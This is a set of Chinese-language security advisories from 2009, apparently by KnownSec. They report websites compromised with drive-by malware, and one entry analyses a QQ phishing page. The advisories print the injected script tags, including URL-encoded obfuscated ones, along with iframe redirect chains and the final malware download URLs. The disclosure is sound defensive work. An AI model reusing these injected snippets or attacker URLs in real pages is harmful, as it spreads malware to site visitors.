知道创宇

发布时间：Sat Aug 29 2009 21:09:13 UTC+0800
最后更新时间：Sat Aug 29 2009 21:09:13 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 硅谷动力游戏玩家论坛（http://gamebbs.enet.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://gamebbs.enet.com.cn/

网页被嵌入恶意链接代码：

<script src=http://219.159.68.185/check.js></script>
挂马分析：
[wide]http://gamebbs.enet.com.cn/
    [script]http://219.159.68.185/check.js
        [iframe]http://213nizhenniu.7766.org/wwj2/1.htm?
            [iframe]http://gt5ev.cn/x118/xx.html
                [iframe]http://gt5ev.cn/x118/td14.htm
                [iframe]http://gt5ev.cn/x118/yt.htm
                [iframe]http://gt5ev.cn/x118/dxxz.htm
                [iframe]http://gt5ev.cn/x118/yut.htm
                    [iframe]http://gt5ev.cn/x118/ytfl.htm
                    [iframe]http://gt5ev.cn/x118/ytfl1.htm
                    [iframe]http://gt5ev.cn/x118/of.htm
        [iframe]http://213nizhenniu.7766.org/wwj2/1.htm?
        [iframe]http://213nizhenniu.7766.org/wwj2/1.htm?
        [iframe]http://213nizhenniu.7766.org/wwj2/1.htm?
最终下载病毒文件：
http://d.bgsew.com/xx/x118.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Fri Aug 28 2009 20:23:06 UTC+0800
最后更新时间：Fri Aug 28 2009 20:23:06 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 厦门房子网（http://www.xmfangzi.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.xmfangzi.com/inc/search.js

网页被嵌入恶意链接代码：

document.write(’<script src=http://219.159.68.185/check.js></script>’)

挂马分析：
[wide]http://www.xmfangzi.com/
    [script]http://www.xmfangzi.com/inc/search.js
        [script]http://219.159.68.185/check.js
            [iframe]http://213nizhenlihai.7766.org/wwj2/1.htm?
                [iframe]http://ds3gj.cn/x118/xx.html
                    [iframe]http://ds3gj.cn/x118/td14.htm
                    [iframe]http://ds3gj.cn/x118/yt.htm
                    [iframe]http://ds3gj.cn/x118/dxxz.htm
                    [iframe]http://ds3gj.cn/x118/yut.htm
                        [iframe]http://ds3gj.cn/x118/ytfl.htm
                        [iframe]http://ds3gj.cn/x118/ytfl1.htm
                        [iframe]http://ds3gj.cn/x118/of.htm
            [iframe]http://213nizhenlihai.7766.org/wwj2/1.htm?
            [iframe]http://213nizhenlihai.7766.org/wwj2/1.htm?
            [iframe]http://213nizhenlihai.7766.org/wwj2/1.htm?
最终下载病毒文件：
http://d.bgsew.com/xx/x118.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Wed Aug 26 2009 22:16:31 UTC+0800
最后更新时间：Wed Aug 26 2009 22:16:31 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 新动态武汉英语培训中心（http://www.ndichina.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.ndichina.com.cn/

网页被嵌入恶意链接代码：

<script src=http://1count1.count.xj.cn/images/images/1.css></script>
挂马分析：
[wide]http://www.ndichina.com.cn/
    [script]http://1count1.count.xj.cn/images/images/1.css
        [iframe]http://xj.count.xj.cn/images/images/mepeg.htm
        [iframe]http://xj.count.xj.cn/images/images/ff.htm
        [iframe]http://xj.count.xj.cn/images/images/of.htm
        [iframe]http://xj.count.xj.cn/images/images/tj.htm
最终下载病毒文件：
http://0o0o0o.8866.org/images/images/js.js

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：2
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Wed Aug 26 2009 21:58:19 UTC+0800
最后更新时间：Wed Aug 26 2009 21:58:19 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 考研共济网（http://www.kaoyantj.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://hotzhuanye.kaoyantj.com/040201/default.html

网页被嵌入恶意链接代码：

<script src=http://99j4.org/0.js></script><script src=http://3b3.org/c.js></script>
挂马分析：
[wide]http://hotzhuanye.kaoyantj.com/040201/default.html
    [script]http://99j4.org/0.js
        [iframe]http://baidu826.8866.org/1/google.htm?0
            [script]http://baidu826.8866.org/1/google_ad.js
                [iframe]http://baidu826.8866.org/1/cqqmp.htm
            [script]http://baidu826.8866.org/1/google_ads.js
                [iframe]http://baidu826.8866.org/1/ec1.htm
                [iframe]http://baidu826.8866.org/1/fyfl.htm
                [iframe]http://baidu826.8866.org/1/ecof.htm
                [iframe]http://baidu826.8866.org/1/fydvd.htm
                [iframe]http://baidu826.8866.org/1/fycry.htm
            [script]http://baidu826.8866.org/1/google_adx.js
                [iframe]http://baidu826.8866.org/1/cqq0.htm
                [iframe]http://baidu826.8866.org/1/ecb.htm
                [iframe]http://baidu826.8866.org/1/fyr.htm
                [iframe]http://baidu826.8866.org/1/ecfox.htm
            [script]http://baidu826.8866.org/1/music.js
                [iframe]http://baidu826.8866.org/1/sfpf.htm
    [script]http://3b3.org/c.js
最终下载病毒文件：
http://fuck.ss.la/1.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Tue Aug 25 2009 09:54:48 UTC+0800
最后更新时间：Tue Aug 25 2009 09:54:48 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 华侨大学机电及自动化学院（http://med.hqu.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://med.hqu.edu.cn/

网页被嵌入恶意链接代码：

<script type=”text/javascript” language=”JavaScript” src=”http://0810%2E6600%2Eorg” id=”seraph3script6243″  ></script>

<script language=”JavaScript” type=”text/javascript” src=”http://c0812.2288.%6Frg” id=”seraph4script6785″  ></script>
挂马分析：
[wide]http://med.hqu.edu.cn/
    [script]http://0810%2e6600%2eorg
    [script]http://c0812.2288.%6frg
        [iframe]http://dsa2e.3322.org/jj/4.htm
            [iframe]http://hiapj.cn/x15/xx.html
                [iframe]http://hiapj.cn/x15/td14.htm
                [iframe]http://hiapj.cn/x15/yt.htm
                [iframe]http://hiapj.cn/x15/dxxz.htm
                [iframe]http://hiapj.cn/x15/yut.htm
                    [iframe]http://hiapj.cn/x15/ytfl.htm
                    [iframe]http://hiapj.cn/x15/ytfl1.htm
                    [iframe]http://hiapj.cn/x15/of.htm
最终下载病毒文件：
http://d.aloxx.com/xx/x15.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Mon Aug 24 2009 19:44:10 UTC+0800
最后更新时间：Mon Aug 24 2009 19:44:10 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 杭州网（http://www.hangzhou.com.cn/）多处被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:
http://bbs.hangzhou.com.cn/
http://blog.hangzhou.com.cn/include/js/common.js

网页被嵌入恶意链接代码：

<script src=http://click.cwebgame.com/api.js></script>
挂马分析：
[wide]http://blog.hangzhou.com.cn/
    [script]http://blog.hangzhou.com.cn/include/js/common.js
        [script]http://click.cwebgame.com/api.js
            [iframe]http://virusjp.9966.org/xm/1.htm?
                [iframe]http://giljl.cn/x96/xx.html
                    [iframe]http://giljl.cn/x96/td14.htm
                    [iframe]http://giljl.cn/x96/yt.htm
                    [iframe]http://giljl.cn/x96/dxxz.htm
                    [iframe]http://giljl.cn/x96/yut.htm
                        [iframe]http://giljl.cn/x96/ytfl.htm
                        [iframe]http://giljl.cn/x96/ytfl1.htm
                        [iframe]http://giljl.cn/x96/of.htm
            [iframe]http://virusjp.9966.org/xm/1.htm?
            [iframe]http://virusjp.9966.org/xm/1.htm?
            [iframe]http://virusjp.9966.org/xm/1.htm?
最终下载病毒文件：
http://d.aloxx.com/xx/x96.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

知道安全团队(KnownSec Team)于今日监测到一个模仿QQ安全中心的钓鱼网站，该钓鱼网站的仿真度极高。QQ用户一旦使用此网站提供的“修改密码”功能更改密码，可能导致账户被窃取。

钓鱼网站链接：http://www.qq-anquan.com/

钓鱼网站界面：

当用户进入http://www.qq-anquan.com/ydbhht/Index.htm时，将会出现一个登录窗口，要求用户输入账户、密码以及验证码（验证码是从腾讯网站上调用来的）。

在登录窗口上点击右键，选择“属性”，来看下该窗口的URL：
http://www.qq-anquan.com/ydbhht/QQ安全中心.files/login.htm

显然该窗口并非腾讯官方的。

将该链接复制到地址栏，继续分析。

点击右键，查看源文件：

从第59行到61行，可以看到一个表单的标签：
<FORM id=loginform style=”MARGIN: 0px” name=loginform
onreset=”return onFormReset(loginform)” onSubmit=”return ptui_onLoginEx(loginform, ‘qq.com’)”
action=../one/index_1.asp  target=”_parent”>
表单标签的“action=”之后的链接即登录框内信息所要提交的页面。

从这里我们可以看出，信息不是提交到腾讯官方的登录页面的。

通过以上信息，我们可以复原该钓鱼网站的登录信息记录页面为：
http://www.qq-anquan.com/ydbhht/one/index_1.asp

复原链接的方法是这样的：
../是指当前目录的上一级目录，在这里就是指http://www.qq-anquan.com/ydbhht/
然后将one/index_1.asp直接添加到上面就得到了完整的URL。

直接将连接复制到地址栏里，打开新页面，该页面内部调用了http://www.qq-anquan.com/ydbhht/one/QQ安全中心.files/set_question.asp
将鼠标在文本框附近点右键查看“属性”可以看到。当然直接查看当前页面的源文件也可以发现一个框架：
<IFRAME src=”QQ安全中心.files/set_question.asp?u=&p=” mce_src=”QQ安全中心.files/set_question.asp?u=&p=” frameBorder=0
width=800 scrolling=no height=350></IFRAME>

进入http://www.qq-anquan.com/ydbhht/one/QQ安全中心.files/set_question.asp查看源文件，可以发现：
<FORM name=myform onSubmit=”return checkForm();”
action=../../humeiyan/set.asp method=post autocomplete=”off”>
复原链接：http://www.qq-anquan.com/ydbhht/humeiyan/set.asp
直接进入该链接，可以发现，该页面提示：

但实际我们是没有输入密码的。O(∩_∩)O哈哈~

今后大家遇到类似的网站，无法判断真假的时候也可以通过以上步骤进行简单的判断。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 15% [?]

发布时间：Mon Aug 24 2009 11:10:29 UTC+0800
最后更新时间：Mon Aug 24 2009 11:10:29 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 IT168摩托罗拉论坛（http://moto.it168.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://moto.it168.com/

网页被嵌入恶意链接代码：

<script src=http://click.cwebgame.com/api.js></script>
挂马分析：
[wide]http://moto.it168.com/
    [script]http://click.cwebgame.com/api.js
        [iframe]http://viruscn.9966.org/xm/1.htm?
            [iframe]http://fieso.cn/x96/xx.html
                [iframe]http://fieso.cn/x96/td14.htm
                [iframe]http://fieso.cn/x96/yt.htm
                [iframe]http://fieso.cn/x96/dxxz.htm
                [iframe]http://fieso.cn/x96/yut.htm
                    [iframe]http://fieso.cn/x96/ytfl.htm
                    [iframe]http://fieso.cn/x96/ytfl1.htm
                    [iframe]http://fieso.cn/x96/of.htm
        [iframe]http://viruscn.9966.org/xm/1.htm?
        [iframe]http://viruscn.9966.org/xm/1.htm?
        [iframe]http://viruscn.9966.org/xm/1.htm?
最终下载病毒文件：
http://d.aloxx.com/xx/x96.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

发布时间：Sun Aug 23 2009 16:38:01 UTC+0800
最后更新时间：Sun Aug 23 2009 16:38:01 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 游戏365论坛（http://bbs.g365.net/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://bbs.g365.net/

网页被嵌入恶意链接代码：

<script src=http://219.159.68.185/cnzz.js></script>
挂马分析：
[wide]http://bbs.g365.net/
    [script]http://bbs.g365.net/include/javascript/common.js
        [script]http://219.159.68.185/cnzz.js
            [iframe]http://viruscn.9966.org/wwj2/1.htm?
                [iframe]http://foqij.cn/x118/xx.html
                    [iframe]http://foqij.cn/x118/td14.htm
                    [iframe]http://foqij.cn/x118/yt.htm
                    [iframe]http://foqij.cn/x118/dxxz.htm
                    [iframe]http://foqij.cn/x118/yut.htm
                        [iframe]http://foqij.cn/x118/ytfl.htm
                        [iframe]http://foqij.cn/x118/ytfl1.htm
                        [iframe]http://foqij.cn/x118/of.htm
            [iframe]http://viruscn.9966.org/wwj2/1.htm?
            [iframe]http://viruscn.9966.org/wwj2/1.htm?
            [iframe]http://viruscn.9966.org/wwj2/1.htm?
最终下载病毒文件：
http://d.aloxx.com/xx/x118.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]

发布时间：Sun Aug 23 2009 16:21:04 UTC+0800
最后更新时间：Sun Aug 23 2009 16:21:04 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 硅谷动力游戏玩家论坛（http://gamebbs.enet.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://gamebbs.enet.com.cn/

网页被嵌入恶意链接代码：

<script src=http://219.159.68.185/cnzz.js></script>
挂马分析：
[wide]http://gamebbs.enet.com.cn/
    [script]http://219.159.68.185/cnzz.js
        [iframe]http://viruscn.9966.org/wwj2/1.htm?
            [iframe]http://foqij.cn/x118/xx.html
                [iframe]http://foqij.cn/x118/td14.htm
                [iframe]http://foqij.cn/x118/yt.htm
                [iframe]http://foqij.cn/x118/dxxz.htm
                [iframe]http://foqij.cn/x118/yut.htm
                    [iframe]http://foqij.cn/x118/ytfl.htm
                    [iframe]http://foqij.cn/x118/ytfl1.htm
                    [iframe]http://foqij.cn/x118/of.htm
        [iframe]http://viruscn.9966.org/wwj2/1.htm?
        [iframe]http://viruscn.9966.org/wwj2/1.htm?
        [iframe]http://viruscn.9966.org/wwj2/1.htm?
最终下载病毒文件：
http://d.aloxx.com/xx/x118.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：1
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com
联系电话:13552251891。

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]